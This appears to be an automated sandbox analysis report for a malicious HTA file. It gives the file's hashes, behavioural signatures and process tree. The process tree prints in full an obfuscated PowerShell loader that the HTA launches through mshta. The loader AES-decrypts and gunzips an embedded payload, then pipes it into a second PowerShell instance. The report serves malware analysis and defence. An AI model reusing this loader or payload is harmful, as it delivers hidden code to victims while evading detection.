Analysis
-
max time kernel
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
submitted
05-02-2024 14:07
General
-
Target
05022024_2208_chache.hta
-
Size
73KB
-
MD5
26daad505b15a76a4ae1be76f9c77488
-
SHA1
70d2f0a9a4f51316f65ff8b895518c6fb824f4c7
-
SHA256
4644c5cfe036b53190d6f36a2d9e3067ea05622481092ab05b55e5754e89ba2e
-
SHA512
96e8cc6ea11bd22d9a3195f87c5d4e241e58a1c6fca2de4db1dab4a08d8cd4d4b7a9a51a7b478f16422c030cd675b7ab144015de8c87bcec03bc5c0568c26ffc
-
SSDEEP
768:kohVndK3EFiaID3u1cP/wTgdok7h/ZdmYu7aZD0fJgPKOjLxphC8U4u4EeUeEgFa:kobndK4IDeshU3gfALti5Oz
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\05022024_2208_chache.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $dosMCx = 'AAAAAAAAAAAAAAAAAAAAAJYy7XorWRa+qK18RLz3MACGVTIKVi/vdrN09kdAQH00Qn4s73pwYVuBD2RlZ1yXsBP2ZxjZgKK/f4r1gG0lS02I0qv+m8d422KPqJ+ltFIsCuPgS/xI2dwtPWMDLkdI20Clkwx5VZyCFeOdH1WIsbv4p1Pe5oFoOX9SyRVx90GHDHAA6DOeyMLE1xh8FCdnRUmpO6pBu7tBB9mA7hnCpklMO7II8c3/daXyugSWq1OjNU3R80IJUqfS8ek34F32k6+DOj1fUxbhf9jqZVuLdF42WOptJK4papSQRTb48+4bFSeQTg1k8LZW20JyRbP/sxjr2hR7P5xKHKtRblEXhPPLEi68IdKGwwR9ywLokeSsn23HO4dEG2ZFMmr2TvuFwIbegWNFyKDBw0iBOQqPsXcQ1LL9yl8GaRfBh7tDXOckFCpMVnQ4ZsNnsdroqz3o2qnFXhaqDoMzArWJzbl1F3yOpWkdxlqcl9mKAKjaRmxYH8xSBxHIGo0glG/WiHuMovynOXcXXh9Hh7tvnfR4Z8XcJbOBdduaGZzQgfOJcjQPkbl99gxEPCpR+AFkEc5QhNTRMOOk3POJ7cPD6VkHYYHY6uJAbx8QOEPph0d7YPQ/FKdxkI/tfMm9ah2acL21+COso6YMbzzmykNdOlzml25gmgBX1ZkUKiJRlMYFulkcxFFVnrPvMRifQ1U/9wilMy/LGTvskHqwq23XICS7ROV4UVcFqA6zkopDdFR24NHk1DdpeJRgjBoP/dv/MDa0XJseW+cJYLSL7C4vwoTde/9CiMwx1U0MhCOTXMDjZFPmUUSfRQlLhEOx43ZcB5KqA+H4G7/aBt14HuhutzT6KwXTjp9E0uH4aXQhDtH6mpJmhGuTGJG3Dq8uri8LoJlYdZsDaDoTotWCBSNieE50OA/wpX1q3h0N/trtKG5rCUYFzP/edxhrB7ecD9u265tHsHZNqhnsB/2r9mF+Nwvk080HbCYZzby2UZiApH8R0Gi7';$fZlRFWv = 'dnZWQ2RTQlpYQVZGV3NUUEhKSGhhYmhuS3hJUVVoZVk=';$KgUYArj = New-Object 'System.Security.Cryptography.AesManaged';$KgUYArj.Mode = [System.Security.Cryptography.CipherMode]::ECB;$KgUYArj.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$KgUYArj.BlockSize = 128;$KgUYArj.KeySize = 256;$KgUYArj.Key = [System.Convert]::FromBase64String($fZlRFWv);$iHuNw = [System.Convert]::FromBase64String($dosMCx);$uIavcLcj = $iHuNw[0..15];$KgUYArj.IV = $uIavcLcj;$ZLmvFdAFX = $KgUYArj.CreateDecryptor();$dcDqIMMEQ = $ZLmvFdAFX.TransformFinalBlock($iHuNw, 16, $iHuNw.Length - 16);$KgUYArj.Dispose();$UOwkrU = New-Object System.IO.MemoryStream( , $dcDqIMMEQ );$wzZeKR = New-Object System.IO.MemoryStream;$lUYoKGCdC = New-Object System.IO.Compression.GzipStream $UOwkrU, ([IO.Compression.CompressionMode]::Decompress);$lUYoKGCdC.CopyTo( $wzZeKR );$lUYoKGCdC.Close();$UOwkrU.Close();[byte[]] $SKbxu = $wzZeKR.ToArray();$Yotlw = [System.Text.Encoding]::UTF8.GetString($SKbxu);$Yotlw | powershell -2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5456e0efbee2b30f31430d821415ba25a
SHA115db0e3fa106e076f6c1278b26d62f6cf9d92ce9
SHA2562bb9489a872aa2d3dd7fdd076d4184f940555a00add0bc6b228d2bc7926c1467
SHA5121d5915e93a50a6b570bc998839cd5bf28bafda67595001459cc0992c89b76a6f641ad70b7cb23ca5893e1fd1923d0039b4c691d1686d66229909652e231da8f5
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
5.7MB